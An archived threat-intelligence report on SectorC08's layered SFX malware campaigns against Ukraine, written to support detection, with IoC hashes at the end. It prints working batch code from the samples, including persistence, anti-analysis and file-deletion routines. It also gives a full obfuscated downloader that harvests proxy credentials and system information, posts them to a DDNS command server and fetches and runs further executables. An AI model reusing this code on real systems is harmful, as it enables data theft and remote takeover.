{
	"id": "56b5a64d-eab3-4cb0-ad68-4600be7ad7d9",
	"created_at": "2026-04-06T00:09:30.817355Z",
	"updated_at": "2026-04-10T03:35:41.857007Z",
	"deleted_at": null,
	"sha1_hash": "9cd65052f9dc3d8fddfaaa426a551635a78d0d73",
	"title": "Multi-Layered SFX in Recent Campaigns Target Ukraine – Red Alert",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 217094,
	"plain_text": "Multi-Layered SFX in Recent Campaigns Target Ukraine – Red\r\nAlert\r\nArchived: 2026-04-05 18:19:22 UTC\r\nOverview\r\nUnlike other state sponsored threat actors, SectorC08 appears to be only concerned with a single target: Ukraine.\r\nArtifacts of their likely activity have been found as far back as 2013 and up till today their modus operandi in their\r\ninitial stages of operation has not changed much.\r\nWe analyzed over 50 of their executable malware files found very recently in order to look at similarities,\r\ndifferences, and outliers. We found that while a few samples still used SectorC08’s executable file structure which\r\ncontained batch scripts which were split out into many files (e.g. Wariables.cmd) or batch scripts together with a\r\ndecoder executable and an encoded executable, most of them followed the structure we will be detailing below.\r\nExample of a Typical First Stage Structure\r\n(a8f849d536481d7d8a0fa59a7bcc03dd3387ab4cc14c0342371ae295817f505c)\r\nAll samples which we can confirm came in the months of May and June used the same structure in their malware\r\nwhich we will be describing below: a 7zSFX archive which opens a password protected WinRARSFX archive,\r\nwhich then attempts to use a version of wget to download its third stage malware which is another WinRARSFX\r\narchive such as UltraVNC.\r\n \r\nFake Documents\r\n  Some of the malware samples we found contained an embedded fake document in them pertaining to Ukrainian\r\nissues. We observed six such embedded fake documents which were sometimes reused against different targets.\r\nThese documents are opened from the embedded batch file in the 7zSFX archive environment.\r\nExample of files embedded in a 7zSFX archive. “6710” is the embedded fake document here.\r\nThe batch file is always the file which SectorC08 set to be ran after the 7zSFX archive is executed, and the way the\r\nfile distracts the victim while it performs its malicious activity is to open up a fake document from that batch file.\r\nhttps://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/\r\nPage 1 of 14\n\n18974.cmd – Commands Related to Opening Fake Document\r\n…\r\nset CHeqCJB=Document\r\n…\r\nset EhFWXVK=6710\r\n…\r\ncopy /y “%EhFWXVK%” “%CHeqCJB%.docx”\r\n…\r\n“%CD%\\%CHeqCJB%.docx”\r\n…\r\nThe fake documents are always in Ukrainian and pertain to Ukrainian issues such as legal, political, military or\r\npolice issues.\r\nBy comparing the document content date to the malware internal versioning code (described later) and from our\r\nknowledge of the malware’s previous versioning codes and dates, we can conclude that when the malware internal\r\nversioning code corresponds to a date, it is at least a roughly accurate timestamp and we can create a partial timeline\r\nof events.\r\nFor example, the fake military document dated 21st May 2019 was found in three separate malware samples, where\r\nthe version code “21.05” (21st May) appeared twice and “22.05” (22nd May) appeared once. Another example is the\r\nundated fake police message where the version code “24.05” (24th May) appeared thrice and “prok” and “27”\r\nappeared once each.\r\n \r\nBasic Anti-Analysis\r\n  At the start of this batch script, the malware looks for Wireshark and Process Explorer using the TaskList\r\ncommand. If any of these exist, the script exits using an unspecified label “exit”. But due to an error in their\r\nprogramming logic, this does not actually do everything which the attacker thinks it does.\r\n18974.cmd – Basic Anti-Analysis\r\n…\r\nFor %%g In (wireshark procexp) do (\r\nTaskList /FI “ImageName EQ %%g.exe” | Find /I “%%g.exe”\r\n)\r\nIf %ErrorLevel% NEQ 1 goto exit\r\n…\r\nWhile looking for Wireshark and Process Explorer were consistent across their malware samples, we also found\r\nsingular instances where the malware was also checking for HttpAnalyzer\r\n(9dbc77844fc3ff3565970cb09d629a710fdec3065b6e4c37b20a889c716c53bf) and an old different malware family\r\nsample of SectorC08’s which also checked whether the machine’s username was a known sandbox username such as\r\nhttps://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/\r\nPage 2 of 14\n\n“TEQUILABOOMBOOM” or “MALWARETEST”\r\n(034fed63fc366ff3cf0137caced77a046178926c63faf1a8cd8db9d185d40821).\r\nstatecrypt.cmd – Checking for usernames such as “TEQUILABOOMBOOM”\r\n…\r\nSet ProcessName=wireshark.exe\r\nTaskList /FI “ImageName EQ %ProcessName%” | Find /I “%ProcessName%”\r\nIf %ErrorLevel% NEQ 1 goto hotlog\r\nset name=%username%\r\nif “%name%”==”MALTEST” goto hotlog\r\nif “%name%”==”MALWARETEST” goto hotlog\r\nif “%name%”==”TEQUILABOOMBOOM” goto hotlog\r\nif “%name%”==”SANDBOX” goto hotlog\r\nif “%name%”==”VIRUS” goto hotlog\r\nif “%name%”==”MALWARE” goto hotlog\r\nif “%name%”==”MALWARES” goto hotlog\r\nif “%name%”==”TEST” goto hotlog\r\nif “%name%”==”TROYAN” goto hotlog\r\n…\r\n:hotlog\r\nping 127.0.0.1\r\ntaskkill /f /im mshta.exe\r\nfor /r “%TEMP%” %%d in (.) do dir /b “%%~d” | find /v “”\u003enul || rd /s /q “%%~d”\r\ndel /f /q “%CD%\\*.vbs”\r\ndel /f /q “%CD%\\*.exe”\r\ndel /f /q “%CD%\\*.cmd”\r\nexit\r\nFirst Stage Persistence\r\n  In this sample, the first stage 7zSFX archive contains the first stage batch script (filename: “18974.cmd”), a\r\nshortcut link to run “%USERPROFILE%\\winver.exe -pgblfhsuyjqyst” (filename: “11666”), the fake document\r\n(6710), and the second stage WinRARSFX archive (filename: “5610”). In the first stage batch script, we can see that\r\nthe second stage executable is getting renamed and moved to “%USERPROFILE%\\winver.exe”, then the shortcut\r\nfile is being moved to “%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\winver.lnk” for\r\npersistence.\r\n18974.cmd – Commands Related to Persistence\r\n…\r\nset KsEEKky=”%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\”\r\n…\r\nset “EbnMNIJ=%USERPROFILE%”\r\n…\r\nset UDWwujG=winver\r\nhttps://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/\r\nPage 3 of 14\n\n…\r\nset GLUymyw=5610\r\n…\r\ncopy /y “%GLUymyw%” “%EbnMNIJ%\\%UDWwujG%.exe”\r\n…\r\ncopy /y “11666” %KsEEKky%\\%UDWwujG%.lnk\r\n…\r\nSample Second Stage\r\n(EE623D8FCF366249A381B0CB50CE6295E913F88CB0F9CB4D8116C0F3D9FA16F2)\r\nIn many recent cases, their second stage is a password protected WinRARSFX which contains a VBS file whose\r\nonly purpose is to run batch commands via WScript, a .cmd batch file containing the commands to be ran, and a\r\nrenamed version of wget.\r\nThe second stage WinRARSFX archive\r\nIn this example, we see that the password used to open the second stage is “uyjqystgblfhs”. While SectorC08\r\nsometimes changes the WinRARSFX password (or simply uses another 7zSFX unprotected archive), we observed\r\nthis particular password being used at least 11 times across their various malware samples. This shows that while\r\nthey have likely automated parts of their process for building these batch scripts, a lot of it is still completely\r\nmanual.\r\n18974.cmd – Commands Related to Second Stage Password\r\n…\r\nset “EbnMNIJ=%USERPROFILE%”\r\n…\r\nset UDWwujG=winver\r\n…\r\nset GLUymyw=5610\r\n…\r\nset cjhIZDS=uyjqystgblfhs\r\n…\r\ntaskkill /f /im %UDWwujG%.exe\r\n…\r\ncopy /y “%GLUymyw%” “%EbnMNIJ%\\%UDWwujG%.exe”\r\n…\r\nhttps://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/\r\nPage 4 of 14\n\nstart “” %EbnMNIJ%\\%UDWwujG%.exe -p%cjhIZDS%\r\n…\r\nSecond Stage Persistence and Wget\r\n  After the first stage, the 7zSFX archive always eventually acts as a downloader in the second stage, launching\r\nvarious versions of wget in order to download its third stage.\r\n11009.cmd – Full Contents\r\n@echo off\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nchcp 1251\u003eNUL\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nif SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn\r\nsetlocal enabledelayedexpansion\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nset “qwoMlMx=HKCU\\Software”\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset “CnGKehh=Microsoft\\Windows”\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nset “XCEEJVi=CurrentVersion\\Internet Settings”\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nset GMXXMeP=”%qwoMlMx%\\%CnGKehh%\\%XCEEJVi%”\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nif SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn\r\nFor /F “UseBackQ Tokens=2*” %%n In (`Reg.exe Query %GMXXMeP%^|Find /I “ProxyServer”`) do set BtRtCGM=%%o\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nFor /F “UseBackQ Tokens=2*” %%u In (`Reg.exe Query %GMXXMeP%^|Find /I “ProxyUser”`) do set tBUCICm=%%v\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nFor /F “UseBackQ Tokens=2*” %%n In (`Reg.exe Query %GMXXMeP%^|Find /I “ProxyPass”`) do set BwtKgWA=%%o\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nFor /F “skip=1 Tokens=4*” %%u In (‘vol c:’) Do set KsEEKky=%%u\r\nif %KsEEKky%==is (\r\nFor /F “skip=1 Tokens=5*” %%v In (‘vol c:’) Do set KsEEKky=%%v\r\n)\r\nif SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn\r\nhttps://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/\r\nPage 5 of 14\n\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset EbnMNIJ=22.05\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nset per_24=%computername%\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nset DOHVFwJ=0\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nsysteminfo \u003e UDWwujG\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nFOR /F “tokens=*” %%n IN (UDWwujG) do @IF NOT i%%n==i set CHeqCJB=!CHeqCJB!%%n+###\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset NFJOtqt=%computername%_%KsEEKky:-=%\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nset eNSzFCv=http\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nif SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn\r\nset FbNZKeg=wincreator\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nif SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn\r\nset HIngDXg=ddns.net\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset EhFWXVK=%eNSzFCv%://%FbNZKeg%.%HIngDXg%\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nset GLUymyw=jasfix\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nset “cjhIZDS=%APPDATA%\\Microsoft\\IE”\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nset ViKDbBD=MicrosoftCreate\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nset BDwSMJD=weristotal\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset NOdKmih=winusers\r\nif SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn\r\nset flkpgez=bitvers\r\nhttps://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/\r\nPage 6 of 14\n\nset per_23=”Mozilla/5.0 (Windows NT 10.0) Safari/537.36 OPR/54.0.2952.64″\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nMD “%cjhIZDS%”\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\ncopy “%ViKDbBD%.exe” “%cjhIZDS%\\%BDwSMJD%.exe” /y\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nschtasks /Create /SC MINUTE /MO 30 /F /tn %BDwSMJD%_%KsEEKky:-=%_01 /tr “%cjhIZDS%\\%BDwSMJD%.exe -b -c -t 5 ‘%eNSz\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nschtasks /Create /SC MINUTE /MO 32 /F /tn %BDwSMJD%_%KsEEKky:-=%_02 /tr “%USERPROFILE%\\%NOdKmih%.exe”\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nif defined BtRtCGM (\r\nschtasks /Create /SC MINUTE /MO 31 /F /tn %BDwSMJD%_%KsEEKky:-=%_03 /tr “%cjhIZDS%\\%BDwSMJD%.exe -e http_proxy=htt\r\n)\r\nif SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\n:KTmZDZR\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nset /a xTBHxRg=39*%RANDOM%/32768\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nping -n 10 127.0.0.1\r\nif SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn\r\ntimeout /t %xTBHxRg%\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\ntaskkill /f /im %ViKDbBD%.exe\r\nif SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\n%ViKDbBD%.exe –user-agent=%per_23% –post-data=”versiya=%EbnMNIJ: =%\u0026comp=%per_24%\u0026id=%NFJOtqt: =%\u0026sysinfo=%CHeqCJB\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nif defined BtRtCGM (\r\n%ViKDbBD%.exe –user-agent=%per_23% -e http_proxy=http://%BtRtCGM% –proxy-user=%tBUCICm% –proxy-password=%BwtKgWA%\r\n)\r\nping -n 5 127.0.0.1\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset /a zDGBFmh=0\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nfor %%o in (%GLUymyw%.exe) do (set /a zDGBFmh=%%~Zo)\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nif %zDGBFmh% GEQ 50002 call :FdLHKss\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nset /a xTBHxRg=30*%RANDOM%/32768\r\nif SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn\r\nhttps://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/\r\nPage 7 of 14\n\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nping -n 5 microsoft.com\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\ngoto KTmZDZR\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\n:FdLHKss\r\nstart “” “%GLUymyw%.exe”\r\nif SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn\r\nping -n 11 google.com.ua\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\ndel /q /f “%GLUymyw%.exe”\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nexit /b\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nFrom the sample contents below, we can see that MicrosoftCreate.exe (some version of wget) is being renamed and\r\nmoved to “%APPDATA%\\Microsoft\\IE\\weristotal.exe”. This weristotal.exe is then set to download an EXE file\r\nfrom hxxp://bitvers[.]ddns[.]net/[computerinfo]/winusers.exe in a scheduled task which is then executed in another\r\nscheduled task. The scheduled task to perform the download happens every 30 minutes, and this is important to note\r\nbecause SectorC08’s servers very often returns a HTTP 403 Forbidden error instead of the requested file.\r\nSeparately, the original MicrosoftCreate.exe also attempts to download another executable, jasfix.exe in this case,\r\nfrom hxxp://wincreator[.]ddns[.]net/[computerinfo]/winusers.exe. While both of these wget downloads are to\r\ndifferent DDNS servers, both servers point to the same IP addresses and the same file paths, meaning that it is also a\r\nform of redundancy for SectorC08.\r\nIn order to identify victims, fields sent in the wget command include the “comp” field (containing\r\n%computername% environment variable) and the “sysinfo” field (containing the entire contents of the systeminfo\r\ncommand). All of these are sent in the clear using HTTP.\r\nAnother interesting area to note from how they run wget is the user-agent used and the “versiya” (version) field in\r\nthe post-data. While the user-agent is left as the default wget user agent about half the time, at other times various\r\nand even unusual user-agent strings are used which suggests that SectorC08 sometimes knows which user-agent\r\nstrings are used or likely to be used in the victim environment.\r\nhttps://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/\r\nPage 8 of 14\n\nVersion\r\nCode\r\nUser-Agent\r\n07.05 Mozilla/5.0 (Windows NT 10.0; Win64; x64) Safari/537.36\r\n13.05 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0\r\n13.05 Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) Safari/604.1\r\n21.05 Mozilla/5.0 (Linux; Android 5.1; Neffos C5 Build/LMY47D) Mobile Safari/537.36\r\n21.05 Mozilla/5.0 (X11; Linux x86_64) Safari/537.36\r\n23.05 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0\r\n23.05 Mozilla/5.0 (Windows NT 10.0) Safari/537.36 OPR/54.0.2952.64\r\n24.05 Mozilla/5.0 (Linux; Android 8.0.0; SM-G955F Build/R16NW) Safari/537.36\r\n24.05 Mozilla/5.0 (Windows NT 5.1) Chrome/49.0.2623.112\r\nU_04 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0\r\nUSB_04 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0\r\nUSB_07 Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0\r\nUSB_08 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0\r\n%1_401\r\nMozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.64\r\nosb Mozilla/5.0 (Windows NT 10.0; Win64; x64) Safari/537.36\r\nAdditionally, if a proxy is defined at “HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings” with\r\nthe registry keys “ProxyServer”, “ProxyUser”, and “ProxyPass”, these values will be used in the wget “http_proxy”,\r\n“–proxy-user”, and “–proxy-password” fields in another invocation of wget.\r\nIn total we observed six different versions of wget being used by SectorC08 recently, which are what appears to be\r\ndifferent variations of GNU Wget 1.11.4 and GNU Wget 1.16.\r\n \r\nStage 3 and 4 – UltraVNC\r\n  The file downloaded by wget is actually the stage 3 binary, another 7zSFX archive but this time containing a\r\npassword protected WinRARSFX archive which uses UltraVNC for remote administration. In fact, using UltraVNC\r\nfor unauthorized remote administration has been a tactic which SectorC08 has been using for many years.\r\nSummary\r\nhttps://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/\r\nPage 9 of 14\n\nSectorC08 is a threat group interested in targeting Ukraine and has been doing so for many years. While their tactics\r\nhave not changed much even after so long, that only goes to show that they have achieved at least some success in\r\ntheir operations over the years. From a technical standpoint, their custom malware might appear to some as\r\nunsophisticated due to the low technical difficulty in creating these malware samples, but in fact due to their creative\r\nuse of various versions of open source utilities and modifying a lot of static information such as the 7zSFX and\r\nWinRARSFX versions used to create their executables and even the icons of every file, they have consistently\r\nachieved low detections from security products and are likely to continue to do so.\r\nIndicators of Compromise (IoCs)\r\nHashes (SHA-256)\r\n26810e37b605df1a444dc9468d79d8ead28e134a9541ee67241eb50924e4236e\r\na3fbc94375920390db0d53e2dd59e7606042e047e017125904de6965a502b2f0\r\nb6addc4567145df117d14cfbe6edac98676af16ac5a2da77fb9da31734e3a50e\r\ncab1a3ede5f8b222f402896b2acc315568ee35b8bed02b4d9172cbe75a206e4e\r\n3399e9e57052410411bade73176cea11479a46a7adf866b615a6f369f3e8e9d2\r\n374fd24a31894d9090e46f7bd25cfe5192981e4df45ef7a9be128e37a9e11dde\r\n8c6673f5081bf1389bd5adb88453d86900e17aaa4b9887aa7eb1fd02bbe89dca\r\n9034b7fd62f9d655c7bbbee19f33e9d334fe57849ca938f3293cdb41647e0e89\r\n3c464eb893b719c35064a5ed60f9a204e231b3f5e960782893e4a5f1124aff3b\r\n5dae4d7bbff9ebe9f4032c009f233633baa79061efd7a9e3deaf2c0bc18ac742\r\n020c268089ff2590d27349d0ba9e748269e3afa40127f7acb9d44fcc31a0c30f\r\n73eae0ddc00d228c49ee6aa3369603fb153b56264b8092dd175c2fb49646af39\r\na7cb50745886f2535d7eefde299cdaa2f64df44163c09a779c9f859bc6304d87\r\n958a9876b158c4ef96556535a2822b2a5193259c4a71086c5ed003c8e5109b63\r\n2709dc808c0fbf6d4990466e44b15f9aa2c94569a137dbb83a95fc8e1beefb89\r\n55cdfe068487a8ca2c1bbfe852f27c9f0d1918d6d5182f28456a5af361511ce3\r\n3bbedec42b4fb9ee2624b36ebb9214d41405a399df86a9332e5cc45cf399201c\r\nbe41c927eb7445e759027b84a87426643d39f6287320ef085889b8367e311bfd\r\na800af4fb370c0afb58c4a300e4fcd7f25439d3379bdf82687a1e86848209799\r\n5555a3292bc6b6e7cb61bc8748b21c475b560635d8b0cc9686b319736c1d828e\r\n1fa39419ea9c2e46acc1f84a6513ae05db8b66cf2fad419962c86ec32f63b5af\r\nc298f905949799fd52c162f35bea112bddc9fa2f921a47f346818d95f71a5c2e\r\n9d51ff330c2772458a8597252b9d13af4ff41e277a942a978070cb8280621760\r\n151ddd68312859bb7b13d3486b95f2f48a4cc7eea3d4f4f4ffc643f2fd34eed6\r\n78daa3f1af5489ee9926752a92e024e2ba18587e53463d81676598d5ccdc3b24\r\nabe17d0cefbbfd24a8df1607ff30628960a4bc5baf035c9d07e15628727523d3\r\ncbbd69de64be85fe1a0d63acde5bf735bd424a57c25893036bb2a16fc99cec2c\r\na8f849d536481d7d8a0fa59a7bcc03dd3387ab4cc14c0342371ae295817f505c\r\n9dbc77844fc3ff3565970cb09d629a710fdec3065b6e4c37b20a889c716c53bf\r\nfc3a1af59e1ff1d1d4fe38976900708e2003d40e065b075e517cd483d440fe57\r\n1c139173ea4b615a09d27070443f6b601d8571d02fd5445cfec2ce690c276da1\r\n09c527ed64ac87b9dfce00e6ed5562d1fc508bfb018eac493cf0c02558c7a840\r\nhttps://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/\r\nPage 10 of 14\n\nd55cb155a97c7c8dfea78b54fa6a5b0a8952068a87357fac221fbe6e70d7a1ea\r\ncadb3faa4953c3e9f0f2a5204373b20a2984ee371b9d230717dbfa67e84eb9c4\r\n14212c4cc251bb1876a01b6fbcc68eb7d0f8e754cac66b417aa0589229471f14\r\n31d8d4e95d2d932c3a9cfc8aea15f8fc464290202f8d681f1e63b93cbf057c1a\r\n548b0ef8da5ec586fb47e56c852e4f7b3f3c424ed9deabc91416bdf996885820\r\ncd59b18c84e79c5fcf5a93600e06493d84c9766985ed7cfab3b9478a4c30472e\r\n39629483da85cb8bf8a32e83f54a6a89320fc9e574d657f0636207d1eb669f38\r\n2a1efabb5a1eb219ae9232a28c9e37d176dd98866c93509f11733dd9e8fce97b\r\n449dd5126d51d51b1f0f6bebea52b36c9aa196f2f2cbd6e677013e26bd832ffb\r\n22821897a44e2db6a816f54a21e34aa59234baf2d3ae54d9ecaadd0ceceffa74\r\nd708c90d51efd1a7b6bc5142b6736bd90454d943d9d6e1860cd6395918ff9ad0\r\n14e814c9cb2e0a03055163625b3099706bd92b95141831acb9150cfba1403bfa\r\n9f697822a3d4714d3b0732aead3c0b2ba14c99f183d06b0694c98a5578cc08c4\r\n601d85c0236f8d3a82fecf353adb106fac23f1681ef866783ff6e634538c9ce0\r\nba2b5092d1fb79698b6f25c4a435632887164672bd355add2c7e7ffce9a45d72\r\nd3ad9b3b0b6cee60c828c847c9ebd9f7cd5e6b6b5ef31b368b16437e48f7204f\r\n80301273fa0189a57514611a17fe79809a5c1eb044000399b7fce9a73379a9b9\r\n6ffee0a44eaf37c8f00e16e18484bebbf4cad32c9b65b7e1329284d92ca0ff5e\r\n6e524e4caa5975f391219dfe5bf03c63e9b248036b264efb7f3f37f4652348b3\r\nddcb6a9f5cb1789615985314c58d21f43140e3d53b95b92ffe7e097143cc7763\r\nd55cb155a97c7c8dfea78b54fa6a5b0a8952068a87357fac221fbe6e70d7a1ea\r\n80e876d46ddfb5348d9b8ea6fbb907d6c1029da3854dd3366ab4891c4967b305\r\n72bbbee65e033826b95f4e6fdea6ca124f00f007f7fb080c7568a523523c4111\r\n362b3b172c95bd9d0b04bec3878460d379e2a47e90e23ae54e5d7f991a1ea69c\r\n034fed63fc366ff3cf0137caced77a046178926c63faf1a8cd8db9d185d40821\r\ndd1cdb0ecd48dfc9b7d500414bfc8b07b1babcbb7f8a77eb83a369dabfe8bf93\r\n1093b834938d7547181a14832c3caa95211c75af987f01745cd319e2e5144dfd\r\n9d89ac5d55568d4b37e86c52e8adae57cfe643d134858f4f1404c2e1432976df\r\nb74e88a130823bfb3fae18bc8b8c9eb2553598cb215b2559f436aa3f0875dc64\r\nwget utilities (SHA-256)\r\n92CCC276806C98C4A163855ED6532395438435DB433ECF02A04A9295F6703492\r\nF5BDE8107EC70097D786896F4AA16B96B597DBF0936F61C7856D4C686AA69B54\r\nA48AD33695A44DE887BBA8F2F3174FD8FB01A46A19E3EC9078B0118647CCF599\r\n68452CEDF3D911013B416FE13744D59B5BD15044D9DF13178FF117EA0E05C44F\r\n888BA9147BA89B5713AFE031449BE46BB20972F68839BC3546A511109A496197\r\n8B50E3CA06A22D0BE6A71232B320137C776F80AC3F2C81B7440B43854B8A3BF0\r\nEmbedded Lure Documents\r\n67FF9031CE8931FCB4E2AE0E72D1D3B8A67EA39257BB7759DCEA925757A85DD8\r\n4A1B730A2AF2A498D452625CB952297630956B2236AE381051E91C53477E9C2D\r\n606C3D0AE26F6D0C17724409FBDB6960FE246FBF63B3564B06507A68BE6D2F31\r\nB511E05100B3A4F3515C5526D2DC3C873F66384225C174C65931744D9E682DC0\r\nhttps://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/\r\nPage 11 of 